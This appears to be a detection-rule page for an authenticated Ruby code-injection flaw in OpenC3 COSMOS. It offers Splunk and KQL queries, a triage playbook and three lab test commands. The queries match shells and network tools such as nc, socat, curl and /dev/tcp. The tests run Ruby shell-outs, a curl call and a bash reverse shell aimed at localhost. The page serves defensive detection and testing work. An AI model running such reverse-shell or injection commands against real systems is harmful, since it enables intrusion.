CVE-2026-77602 Splunk · SPL

Detect OpenC3 COSMOS Authenticated RCE via User-Writable Config Overlay (CVE-2026-77602) in Splunk

Detects exploitation of CVE-2026-77602, an authenticated remote code execution vulnerability in OpenC3 COSMOS (>= 5.1.0, <= 7.2.1). COSMOS evaluates user-supplied configuration files from the writable config overlay — table definitions, command/telemetry (cmd/tlm) definitions, and script suites — as Ruby code. An authenticated user with write access to the config bucket/overlay can embed arbitrary Ruby (e.g. via instance_eval, backticks, system, or inline Ruby in config directives) that executes with the privileges of the COSMOS service when the config is parsed or a script suite is run. CWE-94 (Code Injection). CVSS 9.9, PoC public. This detection looks for suspicious writes/uploads of config overlay files containing executable Ruby primitives, COSMOS service processes spawning shells or interpreters, and anomalous child processes under the cmd-tlm-api / script-runner-api containers.

MITRE ATT&CK

Tactic
Initial Access Execution

SPL Detection Query

Splunk (SPL)
spl
index=linux (sourcetype="linux:audit" OR sourcetype="sysmon_linux" OR sourcetype="docker:events")
(parent_process_name IN ("ruby","puma","rails","rackup","bundle") OR parent_process="*cmd-tlm-api*" OR parent_process="*script-runner-api*")
process_name IN ("sh","bash","dash","nc","ncat","curl","wget","python","python3","perl","socat")
(process="*-c *" OR process="*/dev/tcp*" OR process="*base64*" OR process="*bash -i*")
| stats count min(_time) as firstTime max(_time) as lastTime values(process) as cmdlines by host, user, parent_process_name, process_name
| convert ctime(firstTime) ctime(lastTime)
| where count > 0
critical severity medium confidence

Identifies COSMOS service processes (ruby/puma/rails) spawning shells or network utilities with command-execution flags, a signature of config-overlay Ruby injection.

Data Sources

Linux auditdSysmon for LinuxDocker events

Required Sourcetypes

linux:auditsysmon_linuxdocker:events

False Positives & Tuning

  • COSMOS plugin installation legitimately invoking package managers or shells
  • Scheduled operator automation using curl/wget
  • Container entrypoint and healthcheck scripts invoking a shell at startup

Other platforms for CVE-2026-77602


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Ruby inline code execution simulating config overlay parse

    Expected signal: Process launch of ruby parenting /bin/sh and id/hostname; execve records in auditd/Sysmon-for-Linux.

  2. Test 2Ruby backtick command injection

    Expected signal: ruby process spawning curl with network access; process-create and network-connect events.

  3. Test 3Simulated reverse shell from Ruby service context

    Expected signal: ruby parenting bash -i with /dev/tcp redirection; outbound TCP to 127.0.0.1:4444.


Response Playbook

Triage

  1. Confirm the OpenC3 COSMOS version on the affected host is in the vulnerable range (>= 5.1.0, <= 7.2.1); if so, exploitation is plausible.
  2. Identify the config overlay file that was written/modified immediately before the suspicious process launch — inspect table definitions, cmd/tlm definitions, and script suite files in the config bucket (MinIO/S3) or overlay directory for embedded Ruby (instance_eval, system, backticks, %x{}, inline Ruby).
  3. Correlate the authenticated COSMOS user/session that uploaded or edited the config overlay via the cmd-tlm-api / script-runner-api access logs with the timestamp of the shell spawn.
  4. Determine whether the spawned process made outbound network connections (reverse shell, tool download) or wrote new files to disk.

Containment

  1. Isolate the affected COSMOS host/container from the network and revoke the implicated user's session tokens and credentials.
  2. Remove or quarantine the malicious config overlay file(s) from the config bucket/overlay and prevent re-parsing; disable script suite execution until remediated.
  3. Upgrade OpenC3 COSMOS to the patched release (beyond 7.2.1) per GHSA-jjq7-m736-w977 and restrict write access to the config overlay bucket.

Evidence Collection

  1. Preserve the malicious config overlay file(s), the container filesystem diff, and process execution records (auditd/Sysmon) for the spawned shells.
  2. Collect cmd-tlm-api / script-runner-api application logs and the MinIO/S3 access logs showing the config upload, including source IP and authenticated user.

Escalation Criteria

  • !Escalate to IR if the spawned process established outbound C2, downloaded additional tooling, or achieved persistence.
  • !Escalate if lateral movement from the COSMOS host, credential access, or tampering with command/telemetry definitions affecting mission systems is observed.

Investigation Guide

Related Techniques

Forensic Artifacts

  • >Modified/new config overlay files (table defs, cmd/tlm defs, script suites) in the COSMOS config bucket or overlay directory containing Ruby execution primitives.
  • >Process execution records (auditd execve / Sysmon-for-Linux ProcessCreate) showing ruby/puma parenting a shell or network tool.
  • >cmd-tlm-api / script-runner-api access logs and MinIO/S3 object-write events for the overlay upload.

Tuning Guidance

Baseline legitimate COSMOS plugin install/operation shell-outs and container entrypoint scripts, then exclude those specific parent/child/command-line combinations. Tighten by requiring an immediately-preceding config overlay write by the same container, or by alerting only when the spawned process makes outbound connections. In environments where operators routinely run script suites, correlate with unexpected authenticated users or off-hours activity to reduce noise.


Hunting Queries

Hunt for any COSMOS Ruby service process spawning shells/network tools, independent of command-line keywords, to catch lower-noise variants.

Hunting — KQL
kql
DeviceProcessEvents | where InitiatingProcessFileName in~ ("ruby","puma","rails") | where FileName in~ ("sh","bash","nc","curl","wget","python3") | summarize count() by DeviceName, AccountName, ProcessCommandLine, bin(Timestamp, 1h)
Hunting — SPL
spl
index=linux (parent_process_name=ruby OR parent_process_name=puma) process_name IN (sh,bash,nc,curl,wget,python3) | stats count by host, user, process

Atomic Red Team Tests

Test 1 Ruby inline code execution simulating config overlay parse
linux

Simulates COSMOS evaluating a config overlay file by running Ruby that shells out, modeling CWE-94 code injection.

Command

bash
ruby -e 'system("id; hostname")'

Cleanup

bash
echo 'no cleanup required'

Expected Telemetry

Process launch of ruby parenting /bin/sh and id/hostname; execve records in auditd/Sysmon-for-Linux.

Expected Detection

KQL/SPL/EQL rules fire on ruby-parented shell spawn.

Test 2 Ruby backtick command injection
linux

Models Ruby backtick (`%x`) execution as would be embedded in a malicious cmd/tlm definition or script suite.

Command

bash
ruby -e 'puts `curl -s http://127.0.0.1:9999/x || true`'

Cleanup

bash
echo 'no cleanup required'

Expected Telemetry

ruby process spawning curl with network access; process-create and network-connect events.

Expected Detection

Detection matches ruby parent spawning curl with command-line indicators.

Test 3 Simulated reverse shell from Ruby service context
linux

Lab-only simulation of an injected reverse shell as would result from config-overlay RCE. Run only in an isolated lab.

Command

bash
ruby -e 'system("bash -c \"bash -i >& /dev/tcp/127.0.0.1/4444 0>&1\" || true")'

Cleanup

bash
pkill -f '/dev/tcp/127.0.0.1/4444' 2>/dev/null || true

Expected Telemetry

ruby parenting bash -i with /dev/tcp redirection; outbound TCP to 127.0.0.1:4444.

Expected Detection

Rules fire on bash -i / /dev/tcp pattern parented by a Ruby service process.

Related Detections